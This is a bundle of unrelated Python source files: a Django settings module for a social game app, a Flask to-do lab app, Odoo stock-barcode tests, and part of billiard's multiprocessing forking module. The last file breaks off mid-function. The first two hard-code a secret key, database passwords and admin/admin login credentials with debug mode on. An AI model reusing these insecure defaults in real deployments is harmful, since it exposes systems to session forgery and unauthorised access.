https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import logging
# Removed log oauth2 when execute test. If you want to activate debug, change logging.ERROR by
# logging.DEBUG
log = logging.getLogger('oauthlib')
log.setLevel(logging.ERROR)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gh)^9&mtcp($nlm-zvlnb(lpe+b8kgbk(l30@u%xdpk@w5@n%j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
DEV = False
ALLOWED_HOSTS = []
ADMINS = (
('wadobo', 'socializa@wadobo.com'),
)
# Application definition
INSTALLED_APPS = [
    # Django core
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.gis',
    # Third-party: REST API, OAuth2/social login, API docs, test runner
    'rest_framework',
    'rest_framework.authtoken',
    'oauth2_provider',
    'social_django',
    'rest_framework_social_oauth2',
    'rest_framework_swagger',
    'django_nose',
    # Project apps
    'frontend',
    'player',
    'event',
    'game',
    'clue',
    'store',
    'editor',
    'landing',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'socializa.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                # Expose social-auth backends/redirects to templates.
                'social_django.context_processors.backends',
                'social_django.context_processors.login_redirect',
            ],
        },
    },
]

WSGI_APPLICATION = 'socializa.wsgi.application'

REST_FRAMEWORK = {
    # Use Django's standard `django.contrib.auth` permissions,
    # or allow read-only access for unauthenticated users.
    #'DEFAULT_PERMISSION_CLASSES': [
    #    'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
    #],
    # Authentication methods tried in order for API requests.
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'oauth2_provider.contrib.rest_framework.OAuth2Authentication',
        'rest_framework_social_oauth2.authentication.SocialAuthentication',
        'rest_framework.authentication.TokenAuthentication',
        'rest_framework.authentication.SessionAuthentication',
    ),
    # JSON only: no browsable API renderer.
    'DEFAULT_RENDERER_CLASSES': (
        'rest_framework.renderers.JSONRenderer',
    ),
    'TEST_REQUEST_DEFAULT_FORMAT': 'json'
}

# Run the test suite with nose instead of Django's default runner.
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# PostGIS backend is required by django.contrib.gis.
# NOTE(review): credentials are hard-coded — load them from the environment
# for production deployments.
DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.postgis',
        'NAME': 'socializa',
        'USER': 'socializa',
        'PASSWORD': 'socializa',
        'HOST': 'localhost',
        'PORT': '5432'
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
from django.utils.translation import ugettext_lazy as _
LANGUAGE_CODE = 'en-us'
LANGUAGES = [
    ('en', _('English')),
    ('es', _('Spanish')),
]
LOCALE_PATHS = (os.path.join(BASE_DIR, "locale"), )
TIME_ZONE = 'Europe/Madrid'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'

from django.contrib.messages import constants as messages
# Map Django's ERROR message level onto the "danger" CSS class.
MESSAGE_TAGS = {
    messages.ERROR: 'danger',
}

# Dev active
# When DEV is enabled, add the silk profiler and django-extensions.
if DEV:
    MIDDLEWARE += ('silk.middleware.SilkyMiddleware',)
    INSTALLED_APPS += ('silk', 'django_extensions')
    SILKY_PYTHON_PROFILER = True
    SILKY_META = True
    # Profile the two hottest player endpoints without decorating their code.
    SILKY_DYNAMIC_PROFILING = [
        {'module': 'player.views', 'function': 'PlayersNear.get', 'name': 'near players'},
        {'module': 'player.views', 'function': 'MeetingCreate.post', 'name': 'meeting players'}
    ]
    GRAPH_MODELS = {
        'all_applications': False,
        'group_models': True,
    }

# In debug mode, print outgoing email to the console instead of sending it.
if DEBUG:
    EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'

BASE_URL = 'https://socializa.wadobo.com'
DEFAULT_FROM_EMAIL = 'socializa@wadobo.com'
# SOCIAL AUTHENTICATION
AUTHENTICATION_BACKENDS = (
'social_core.backends.google.GoogleOAuth2',
'social_core.backends.facebook.FacebookOAuth2',
'rest_framework_social_oauth2.backends.DjangoOAuth2',
'django.contrib.auth.backends.ModelBackend'
)
SOCIAL_AUTH_PIPELINE = (
# Get the information we can about the user and return it in a simple
# format to create the user instance later. On some cases the details are
# already part of the auth response from the provider, but sometimes this
# could hit a provider API.
'social.pipeline.social_auth.social_details',
# Get the social uid from whichever service we're authing thru. The uid is
# the unique identifier of the given user in the provider.
'social.pipeline.social_auth.social_uid',
# Verifies that the current auth process is valid within the current
# project, this is where emails and domains whitelists are applied (if
# defined).
'social.pipeline.social_auth.auth_allowed',
# Checks if the current social-account is already associated in the site.
'social.pipeline.social_auth.social_user',
# Make up a username for this person, appends a random string at the end if
# there's any collision.
'social.pipeline.user.get_username',
# Send a validation email to the user to verify its email address.
# Disabled by default.
'social.pipeline.mail.mail_validation',
# Associates the current social details with another user account with
# a similar email address. Disabled by default.
'social.pipeline.social_auth.associate_by_email',
# Create a user account if we haven't found one yet.
'social.pipeline.user.create_user',
# Custom function
'player.utils.create_player',
# Create the record that associates the social account with the user.
'social.pipeline.social_auth.associate_user',
# Populate the extra_data field in the social record with the values
# specified by settings (and the default ones like access_token, etc).
'social.pipeline.social_auth.load_extra_data',
# Update the user record with any changed info from the auth service.
'social.pipeline.user.user_details',
)
PROPRIETARY_BACKEND_NAME = 'Django'
SOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True
OAUTH2_PROVIDER = {
'ACCESS_TOKEN_EXPIRE_SECONDS': 24 * 60 * 60 * 365, # a whole year
}
# DEBUG SOCIAL_AUTH
SOCIAL_AUTH_RAISE_EXCEPTIONS = False
# GOOGLE
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = 'update me'
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = 'update me'
GOOGLE_APIKEY = 'update me'
# FACEBOOK
SOCIAL_AUTH_FACEBOOK_KEY = 'update me'
SOCIAL_AUTH_FACEBOOK_SECRET = 'update me'
SOCIAL_AUTH_FACEBOOK_SCOPE = ['email']
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id,name,email',
}
SWAGGER_SETTINGS = {
'DOC_EXPANSION': 'list',
'APIS_SORTER': 'alpha',
'JSON_EDITOR': True,
'OPERATIONS_SORTER': 'alpha',
'USE_SESSION_AUTH': False,
'SHOW_REQUEST_HEADERS': True,
'SECURITY_DEFINITIONS': {
'token': {
'type': 'apiKey',
'name': 'authorization',
'description': 'The valid api_key should be: "Token xxxxxxxxxxx"',
'in': 'header'
},
},
}
# For celery
CELERY_BROKER_URL = 'amqp://localhost'
CELERY_RESULT_BACKEND = 'amqp://localhost'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
DEFAULT_VISION_DISTANCE = 1000 # m
DEFAULT_MEETING_DISTANCE = 10 # m
QR_LENGTH = 16
DEFAULT_PAGINATION = 20
# Allow an optional local_settings.py to override anything above.
# Catch only ImportError: a bare `except:` would silently swallow
# SyntaxError or runtime errors *inside* local_settings.py, making
# a broken override file look like a missing one.
try:
    from local_settings import *
except ImportError:
    print("NO LOCAL SETTINGS")
|
import sqlite3
from flask import Flask, render_template, g, request, session, flash, redirect, url_for, abort
# NOTE(review): credentials and SECRET_KEY are hard-coded lab values;
# a real deployment must load these from the environment or a config file.
DATABASE = 'test.db'
USERNAME = 'admin'
PASSWORD = 'admin'
SECRET_KEY = 'he who shall not be named'
app = Flask(__name__)
# from_object(__name__) copies the UPPERCASE module globals above into app.config.
app.config.from_object(__name__)
@app.route('/')
def welcome():
    """Static landing page for the lab."""
    greeting = '<h1>Welcome to COMPUT 410 - Jinja Lab!</h1>'
    return greeting
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Show the login form; on POST, check credentials and open a session."""
    error = None
    if request.method != 'POST':
        return render_template('login.html', error=error)
    if request.form['username'] != app.config['USERNAME']:
        error = 'invalid username'
    elif request.form['password'] != app.config['PASSWORD']:
        error = 'invalid password'
    else:
        session['logged_in'] = True
        flash("You are logged in :-)")
        return redirect(url_for('task'))
    # Fall through: re-render the form with the validation error.
    return render_template('login.html', error=error)
@app.route('/logout')
def logout():
    """End the session and redirect to the task list.

    Uses pop() with a default so visiting /logout while not logged in
    no longer raises KeyError (the original crashed with HTTP 500).
    """
    session.pop('logged_in', None)
    flash("You are logged out!")
    return redirect(url_for('task'))
@app.route('/delete', methods=['GET', 'POST'])
def delete():
    # Deletion requires an authenticated session.
    if not session.get('logged_in'):
        abort(401)
    # NOTE(review): request.form is only populated on POST, yet the route
    # also accepts GET (which would 400 here) — confirm whether GET should
    # be removed from `methods`.
    removetask(request.form['id'])
    flash('Task was deleted successfully!')
    return redirect(url_for('task'))
@app.route('/task', methods=['GET', 'POST'])
def task():
    """List all tasks; on POST, create a new task (login required)."""
    if request.method == 'POST':
        if not session.get('logged_in'):
            abort(401)
        # Form fields are read left-to-right: category, priority, description.
        addtask(request.form['category'],
                request.form['priority'],
                request.form['description'])
        flash("New task added successfully")
        return redirect(url_for('task'))
    return render_template('show_entries.html',
                           tasks=query_db('select * from tasks'))
def query_db(query, args=(), one=False):
    """Execute *query* with *args*; return all rows, or the first row
    (None when empty) if one=True."""
    cursor = get_db().cursor()
    cursor.execute(query, args)
    rows = cursor.fetchall()
    cursor.close()
    if one:
        return rows[0] if rows else None
    return rows
def get_db():
    """Return the app-context SQLite connection, opening it lazily."""
    conn = getattr(g, '_database', None)
    if conn is not None:
        return conn
    conn = sqlite3.connect(DATABASE)
    conn.row_factory = sqlite3.Row  # rows behave like dicts in templates
    g._database = conn
    return conn
def removetask(id):
    """Delete the task row whose primary key equals *id* and commit."""
    db = get_db()
    query_db('delete from tasks where id = ?', [id], one=True)
    db.commit()
def addtask(category, priority, description):
    """Insert a new task row (id auto-assigned) and commit."""
    db = get_db()
    query_db('insert into tasks values (null, ?, ?, ?)',
             [category, priority, description], one=True)
    db.commit()
@app.teardown_appcontext
def close_connection(exception):
    """App-context teardown hook: close the cached DB connection, if any."""
    conn = getattr(g, '_database', None)
    if conn is None:
        return
    conn.close()
if __name__ == '__main__':
    # Debug mode enables the reloader and in-browser tracebacks; dev only.
    app.debug = True
    app.run()
|
# Copyright 2108-2019 Sergio Teruel <sergio.teruel@tecnativa.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.addons.stock_barcodes.tests.test_stock_barcodes import\
TestStockBarcodes
class TestStockBarcodesPicking(TestStockBarcodes):
    """Exercise the barcode-reading wizard against incoming/outgoing pickings."""
    def setUp(self):
        """Build one 4-line incoming picking, two outgoing pickings and the
        scan wizard opened from the confirmed incoming picking."""
        super().setUp()
        self.ScanReadPicking = self.env['wiz.stock.barcodes.read.picking']
        self.stock_picking_model = self.env.ref('stock.model_stock_picking')
        # Model Data
        self.partner_agrolite = self.env.ref('base.res_partner_2')
        self.picking_type_in = self.env.ref('stock.picking_type_in')
        self.picking_type_out = self.env.ref('stock.picking_type_out')
        self.supplier_location = self.env.ref('stock.stock_location_suppliers')
        self.customer_location = self.env.ref('stock.stock_location_customers')
        self.stock_location = self.env.ref('stock.stock_location_stock')
        self.categ_unit = self.env.ref('uom.product_uom_categ_unit')
        self.categ_kgm = self.env.ref('uom.product_uom_categ_kgm')
        # Outgoing picking with a single lot-tracked move (qty 3).
        self.picking_out_01 = self.env['stock.picking'].with_context(
            planned_picking=True
        ).create({
            'location_id': self.stock_location.id,
            'location_dest_id': self.customer_location.id,
            'partner_id': self.partner_agrolite.id,
            'picking_type_id': self.picking_type_out.id,
            'move_lines': [
                (0, 0, {
                    'name': self.product_tracking.name,
                    'product_id': self.product_tracking.id,
                    'product_uom_qty': 3,
                    'product_uom': self.product_tracking.uom_id.id,
                    'location_id': self.stock_location.id,
                    'location_dest_id': self.customer_location.id,
                }),
            ]
        })
        self.picking_out_02 = self.picking_out_01.copy()
        # Incoming picking: two moves for the untracked product (3 + 5)
        # and two moves for the lot-tracked product (3 + 5).
        self.picking_in_01 = self.env['stock.picking'].with_context(
            planned_picking=True
        ).create({
            'location_id': self.supplier_location.id,
            'location_dest_id': self.stock_location.id,
            'partner_id': self.partner_agrolite.id,
            'picking_type_id': self.picking_type_in.id,
            'move_lines': [
                (0, 0, {
                    'name': self.product_wo_tracking.name,
                    'product_id': self.product_wo_tracking.id,
                    'product_uom_qty': 3,
                    'product_uom': self.product_wo_tracking.uom_id.id,
                    'location_id': self.supplier_location.id,
                    'location_dest_id': self.stock_location.id,
                }),
                (0, 0, {
                    'name': self.product_wo_tracking.name,
                    'product_id': self.product_wo_tracking.id,
                    'product_uom_qty': 5,
                    'product_uom': self.product_wo_tracking.uom_id.id,
                    'location_id': self.supplier_location.id,
                    'location_dest_id': self.stock_location.id,
                }),
                (0, 0, {
                    'name': self.product_tracking.name,
                    'product_id': self.product_tracking.id,
                    'product_uom_qty': 3,
                    'product_uom': self.product_tracking.uom_id.id,
                    'location_id': self.supplier_location.id,
                    'location_dest_id': self.stock_location.id,
                }),
                (0, 0, {
                    'name': self.product_tracking.name,
                    'product_id': self.product_tracking.id,
                    'product_uom_qty': 5,
                    'product_uom': self.product_tracking.uom_id.id,
                    'location_id': self.supplier_location.id,
                    'location_dest_id': self.stock_location.id,
                }),
            ]
        })
        self.picking_in_01.action_confirm()
        # Open the scan wizard with the context returned by the picking action.
        vals = self.picking_in_01.action_barcode_scan()
        self.wiz_scan_picking = self.ScanReadPicking.with_context(
            vals['context']
        ).create({})
    def test_wiz_picking_values(self):
        """Wizard defaults mirror the picking it was opened from."""
        self.assertEqual(self.wiz_scan_picking.location_id,
                         self.picking_in_01.location_dest_id)
        self.assertEqual(self.wiz_scan_picking.res_model_id,
                         self.stock_picking_model)
        self.assertEqual(self.wiz_scan_picking.res_id,
                         self.picking_in_01.id)
        self.assertIn(
            "Barcode reader - %s - " % (self.picking_in_01.name),
            self.wiz_scan_picking.display_name,
        )
    def test_picking_wizard_scan_product(self):
        """Scanning product / lot / package barcodes updates move-line qty_done."""
        self.action_barcode_scanned(self.wiz_scan_picking, '8480000723208')
        self.assertEqual(
            self.wiz_scan_picking.product_id, self.product_wo_tracking)
        sml = self.picking_in_01.move_line_ids.filtered(
            lambda x: x.product_id == self.product_wo_tracking)
        self.assertEqual(sml.qty_done, 1.0)
        # Scan product with tracking lot enable
        self.action_barcode_scanned(self.wiz_scan_picking, '8433281006850')
        sml = self.picking_in_01.move_line_ids.filtered(
            lambda x: x.product_id == self.product_tracking)
        self.assertEqual(sml.qty_done, 0.0)
        self.assertEqual(self.wiz_scan_picking.message,
                         'Barcode: 8433281006850 (Waiting for input lot)')
        # Scan a lot. Increment quantities if scan product or other lot from
        # this product
        self.action_barcode_scanned(self.wiz_scan_picking, '8411822222568')
        sml = self.picking_in_01.move_line_ids.filtered(
            lambda x: x.product_id == self.product_tracking and x.lot_id)
        self.assertEqual(sml.lot_id, self.lot_1)
        self.assertEqual(sml.qty_done, 1.0)
        self.action_barcode_scanned(self.wiz_scan_picking, '8433281006850')
        self.assertEqual(sml.qty_done, 2.0)
        self.action_barcode_scanned(self.wiz_scan_picking, '8411822222568')
        self.assertEqual(sml.qty_done, 3.0)
        self.assertEqual(self.wiz_scan_picking.message,
                         'Barcode: 8411822222568 (Barcode read correctly)')
        # Scan a package
        self.action_barcode_scanned(self.wiz_scan_picking, '5420008510489')
        # Package of 5 product units. Already three unit exists
        self.assertEqual(sml.qty_done, 8.0)
    def test_picking_wizard_scan_product_manual_entry(self):
        """Manual-entry mode lets the user type a quantity after the scan."""
        self.wiz_scan_picking.manual_entry = True
        self.action_barcode_scanned(self.wiz_scan_picking, '8480000723208')
        self.assertEqual(self.wiz_scan_picking.product_id,
                         self.product_wo_tracking)
        sml = self.picking_in_01.move_line_ids.filtered(
            lambda x: x.product_id == self.product_wo_tracking)
        self.assertEqual(self.wiz_scan_picking.product_qty, 0.0)
        self.wiz_scan_picking.product_qty = 12.0
        self.wiz_scan_picking.action_manual_entry()
        self.assertEqual(sml.qty_done, 8.0)
        self.assertEqual(sml.move_id.quantity_done, 12.0)
    def test_picking_wizard_remove_last_scan(self):
        """Undo reverts the quantity recorded by the last scan."""
        self.action_barcode_scanned(self.wiz_scan_picking, '8480000723208')
        self.assertEqual(self.wiz_scan_picking.product_id,
                         self.product_wo_tracking)
        sml = self.picking_in_01.move_line_ids.filtered(
            lambda x: x.product_id == self.product_wo_tracking)
        self.assertEqual(sml.qty_done, 1.0)
        self.wiz_scan_picking.action_undo_last_scan()
        self.assertEqual(sml.qty_done, 0.0)
        self.assertEqual(self.wiz_scan_picking.picking_product_qty, 0.0)
    def test_barcode_from_operation(self):
        """Opening the wizard from a picking *type* proposes candidate
        pickings, which can be locked/unlocked to direct the quantities."""
        picking_out_3 = self.picking_out_01.copy()
        self.picking_out_01.action_assign()
        self.picking_out_02.action_assign()
        vals = self.picking_type_out.action_barcode_scan()
        self.wiz_scan_picking = self.ScanReadPicking.with_context(
            vals['context']
        ).create({})
        self.wiz_scan_picking.manual_entry = True
        self.wiz_scan_picking.product_id = self.product_tracking
        self.wiz_scan_picking.lot_id = self.lot_1
        self.wiz_scan_picking.product_qty = 2
        self.wiz_scan_picking.action_manual_entry()
        self.assertEqual(len(self.wiz_scan_picking.candidate_picking_ids), 2)
        # Lock first picking
        candidate = self.wiz_scan_picking.candidate_picking_ids.filtered(
            lambda c: c.picking_id == self.picking_out_01)
        candidate_wiz = candidate.with_context(
            wiz_barcode_id=self.wiz_scan_picking.id,
            picking_id=self.picking_out_01.id,
        )
        candidate_wiz.action_lock_picking()
        self.assertEqual(self.picking_out_01.move_lines.quantity_done, 2)
        self.wiz_scan_picking.action_manual_entry()
        self.assertEqual(self.picking_out_01.move_lines.quantity_done, 4)
        # Picking out 3 is in confirmed state, so until confirmed moves has
        # not been activated candidate pickings is 2
        picking_out_3.action_confirm()
        candidate_wiz.action_unlock_picking()
        self.wiz_scan_picking.action_manual_entry()
        self.assertEqual(len(self.wiz_scan_picking.candidate_picking_ids), 2)
        self.wiz_scan_picking.confirmed_moves = True
        candidate_wiz.action_unlock_picking()
        self.wiz_scan_picking.action_manual_entry()
        self.assertEqual(len(self.wiz_scan_picking.candidate_picking_ids), 3)
|
#
# Module for starting a process object using os.fork() or CreateProcess()
#
# multiprocessing/forking.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
import os
import sys
import signal
import warnings
from ._ext import Connection, PipeConnection, win32
from pickle import load, HIGHEST_PROTOCOL
from billiard import util, process
__all__ = ['Popen', 'assert_spawning', 'exit',
'duplicate', 'close', 'ForkingPickler']
# On non-Windows interpreters WindowsError does not exist; define a stand-in
# so `except WindowsError` clauses below are always valid.
try:
    WindowsError = WindowsError  # noqa
except NameError:
    class WindowsError(Exception): pass  # noqa
# Warning text emitted when a pre-Django-1.4 setup_environ layout is detected.
W_OLD_DJANGO_LAYOUT = """\
Will add directory %r to path! This is necessary to accommodate \
pre-Django 1.4 layouts using setup_environ.
You can skip this warning by adding a DJANGO_SETTINGS_MODULE=settings \
environment variable.
"""
#
# Choose whether to do a fork or spawn (fork+exec) on Unix.
# This affects how some shared resources should be created.
#
_forking_is_enabled = sys.platform != 'win32'
#
# Check that the current thread is spawning a child process
#
def assert_spawning(self):
    """Raise RuntimeError unless a child process is currently being spawned.

    Used by reducers for objects (connections, handles) that may only be
    pickled so a child can inherit them.
    """
    if Popen.thread_is_spawning():
        return
    raise RuntimeError(
        '%s objects should only be shared between processes'
        ' through inheritance' % type(self).__name__
    )
#
# Try making some callable types picklable
#
from pickle import Pickler
# Python 3 pickle has no class-level `dispatch` table, so custom reducers
# are installed through a per-instance copy of copyreg.dispatch_table.
if sys.version_info[0] == 3:
    from copyreg import dispatch_table
    class ForkingPickler(Pickler):
        # Class-level map {type: reduce_fn} merged into each instance's table.
        _extra_reducers = {}
        def __init__(self, *args, **kwargs):
            Pickler.__init__(self, *args, **kwargs)
            self.dispatch_table = dispatch_table.copy()
            self.dispatch_table.update(self._extra_reducers)
        @classmethod
        def register(cls, type, reduce):
            cls._extra_reducers[type] = reduce
    def _reduce_method(m):
        # Bound/unbound methods pickle as (owner, attribute name).
        if m.__self__ is None:
            return getattr, (m.__class__, m.__func__.__name__)
        else:
            return getattr, (m.__self__, m.__func__.__name__)
    class _C:
        def f(self):
            pass
    ForkingPickler.register(type(_C().f), _reduce_method)
else:
    # Python 2 pickle exposes a class-level dispatch dict we can extend.
    class ForkingPickler(Pickler):  # noqa
        dispatch = Pickler.dispatch.copy()
        @classmethod
        def register(cls, type, reduce):
            def dispatcher(self, obj):
                rv = reduce(obj)
                self.save_reduce(obj=obj, *rv)
            cls.dispatch[type] = dispatcher
    def _reduce_method(m):  # noqa
        # Python 2 method objects carry im_self/im_class/im_func.
        if m.im_self is None:
            return getattr, (m.im_class, m.im_func.func_name)
        else:
            return getattr, (m.im_self, m.im_func.func_name)
    ForkingPickler.register(type(ForkingPickler.save), _reduce_method)
def _reduce_method_descriptor(m):
    # Built-in/slot method descriptors pickle as (owning class, name).
    return getattr, (m.__objclass__, m.__name__)
ForkingPickler.register(type(list.append), _reduce_method_descriptor)
ForkingPickler.register(type(int.__add__), _reduce_method_descriptor)
# Make functools.partial picklable (skipped on interpreters lacking it).
try:
    from functools import partial
except ImportError:
    pass
else:
    def _reduce_partial(p):
        return _rebuild_partial, (p.func, p.args, p.keywords or {})
    def _rebuild_partial(func, args, keywords):
        return partial(func, *args, **keywords)
    ForkingPickler.register(partial, _reduce_partial)
def dump(obj, file, protocol=None):
    """Serialize *obj* to the open *file* with a ForkingPickler, so the
    extra reducers registered above are honoured."""
    pickler = ForkingPickler(file, protocol)
    pickler.dump(obj)
#
# Make (Pipe)Connection picklable
#
def reduce_connection(conn):
    """Reduce a (Pipe)Connection so a spawning child can inherit its handle."""
    # XXX check not necessary since only registered with ForkingPickler
    if not Popen.thread_is_spawning():
        raise RuntimeError(
            'By default %s objects can only be shared between processes\n'
            'using inheritance' % type(conn).__name__
        )
    return type(conn), (Popen.duplicate_for_child(conn.fileno()),
                        conn.readable, conn.writable)
ForkingPickler.register(Connection, reduce_connection)
# PipeConnection is falsy on non-Windows builds; only register when present.
if PipeConnection:
    ForkingPickler.register(PipeConnection, reduce_connection)
#
# Unix
#
if sys.platform != 'win32':
    import thread
    import select
    # No frozen-exe / service special cases on Unix.
    WINEXE = False
    WINSERVICE = False
    exit = os._exit
    duplicate = os.dup
    close = os.close
    # select() wrapped to retry on EINTR.
    _select = util._eintr_retry(select.select)
    #
    # We define a Popen class similar to the one from subprocess, but
    # whose constructor takes a process object as its argument.
    #
    class Popen(object):
        """Start a child process via os.fork(), or fork+exec when forking
        is disabled, and expose a subprocess-like poll/wait/terminate API."""
        _tls = thread._local()
        def __init__(self, process_obj):
            _Django_old_layout_hack__save()
            # Flush so buffered output is not duplicated into the child.
            sys.stdout.flush()
            sys.stderr.flush()
            self.returncode = None
            r, w = os.pipe()
            self.sentinel = r
            if _forking_is_enabled:
                self.pid = os.fork()
                if self.pid == 0:
                    # Child: drop read end, reseed random, run and exit.
                    os.close(r)
                    if 'random' in sys.modules:
                        import random
                        random.seed()
                    code = process_obj._bootstrap()
                    os._exit(code)
            else:
                # fork+exec: a fresh interpreter reads the pickled process
                # object from a pipe whose fd is passed on the command line.
                from_parent_fd, to_child_fd = os.pipe()
                cmd = get_command_line() + [str(from_parent_fd)]
                self.pid = os.fork()
                if self.pid == 0:
                    os.close(r)
                    os.close(to_child_fd)
                    os.execv(sys.executable, cmd)
                # send information to child
                prep_data = get_preparation_data(process_obj._name)
                os.close(from_parent_fd)
                to_child = os.fdopen(to_child_fd, 'wb')
                # Mark this thread as spawning so reducers permit pickling.
                Popen._tls.process_handle = self.pid
                try:
                    dump(prep_data, to_child, HIGHEST_PROTOCOL)
                    dump(process_obj, to_child, HIGHEST_PROTOCOL)
                finally:
                    del(Popen._tls.process_handle)
                to_child.close()
            # `w` will be closed when the child exits, at which point `r`
            # will become ready for reading (using e.g. select()).
            os.close(w)
            util.Finalize(self, os.close, (r,))
        def poll(self, flag=os.WNOHANG):
            """Reap the child if it has exited; return its code or None."""
            if self.returncode is None:
                try:
                    pid, sts = os.waitpid(self.pid, flag)
                except os.error:
                    # Child process not yet created. See #1731717
                    # e.errno == errno.ECHILD == 10
                    return None
                if pid == self.pid:
                    if os.WIFSIGNALED(sts):
                        self.returncode = -os.WTERMSIG(sts)
                    else:
                        assert os.WIFEXITED(sts)
                        self.returncode = os.WEXITSTATUS(sts)
            return self.returncode
        def wait(self, timeout=None):
            """Wait up to *timeout* seconds (forever if None) for exit."""
            if self.returncode is None:
                if timeout is not None:
                    # The sentinel pipe becomes readable once the child dies.
                    r = _select([self.sentinel], [], [], timeout)[0]
                    if not r:
                        return None
                # This shouldn't block if select() returned successfully.
                return self.poll(os.WNOHANG if timeout == 0.0 else 0)
            return self.returncode
        def terminate(self):
            """Send SIGTERM; re-raise the OSError only if still alive."""
            if self.returncode is None:
                try:
                    os.kill(self.pid, signal.SIGTERM)
                except OSError:
                    if self.wait(timeout=0.1) is None:
                        raise
        @staticmethod
        def thread_is_spawning():
            # Plain fork inherits everything; spawning bookkeeping applies
            # only to the fork+exec path.
            if _forking_is_enabled:
                return False
            else:
                return getattr(Popen._tls, 'process_handle', None) is not None
        @staticmethod
        def duplicate_for_child(handle):
            # fds survive fork unchanged; nothing to duplicate on Unix.
            return handle
#
# Windows
#
else:
    import thread
    import msvcrt
    import _subprocess
    #
    #
    #
    # Exit code used to signal termination via TerminateProcess.
    TERMINATE = 0x10000
    WINEXE = (sys.platform == 'win32' and getattr(sys, 'frozen', False))
    WINSERVICE = sys.executable.lower().endswith("pythonservice.exe")
    exit = win32.ExitProcess
    close = win32.CloseHandle
    #
    #
    #
    def duplicate(handle, target_process=None, inheritable=False):
        # Duplicate a Win32 handle into *target_process* (default: ourselves).
        if target_process is None:
            target_process = _subprocess.GetCurrentProcess()
        return _subprocess.DuplicateHandle(
            _subprocess.GetCurrentProcess(), handle, target_process,
            0, inheritable, _subprocess.DUPLICATE_SAME_ACCESS
        ).Detach()
    #
    # We define a Popen class similar to the one from subprocess, but
    # whose constructor takes a process object as its argument.
    #
#
# We define a Popen class similar to the one from subprocess, but
# whose constructor takes a process object as its argument.
#
    class Popen(object):
        '''
        Start a subprocess to run the code of a process object
        '''
        _tls = thread._local()
        def __init__(self, process_obj):
            _Django_old_layout_hack__save()
            # create pipe for communication with child
            rfd, wfd = os.pipe()
            # get handle for read end of the pipe and make it inheritable
            rhandle = duplicate(msvcrt.get_osfhandle(rfd), inheritable=True)
            os.close(rfd)
            # start process
            cmd = get_command_line() + [rhandle]
            cmd = ' '.join('"%s"' % x for x in cmd)
            hp, ht, pid, tid = _subprocess.CreateProcess(
                _python_exe, cmd, None, None, 1, 0, None, None, None
            )
            # Thread handle is unused; the child owns rhandle now.
            ht.Close()
            close(rhandle)
            # set attributes of self
            self.pid = pid
            self.returncode = None
            self._handle = hp
            self.sentinel = int(hp)
            # send information to child
            prep_data = get_preparation_data(process_obj._name)
            to_child = os.fdopen(wfd, 'wb')
            # Mark this thread as spawning so reducers permit pickling.
            Popen._tls.process_handle = int(hp)
            try:
                dump(prep_data, to_child, HIGHEST_PROTOCOL)
                dump(process_obj, to_child, HIGHEST_PROTOCOL)
            finally:
                del Popen._tls.process_handle
                to_child.close()
        @staticmethod
        def thread_is_spawning():
            return getattr(Popen._tls, 'process_handle', None) is not None
        @staticmethod
        def duplicate_for_child(handle):
            # Duplicate into the child being spawned by this thread.
            return duplicate(handle, Popen._tls.process_handle)
        def wait(self, timeout=None):
            """Wait up to *timeout* seconds (forever if None) for exit."""
            if self.returncode is None:
                if timeout is None:
                    msecs = _subprocess.INFINITE
                else:
                    msecs = max(0, int(timeout * 1000 + 0.5))
                res = _subprocess.WaitForSingleObject(int(self._handle), msecs)
                if res == _subprocess.WAIT_OBJECT_0:
                    code = _subprocess.GetExitCodeProcess(self._handle)
                    if code == TERMINATE:
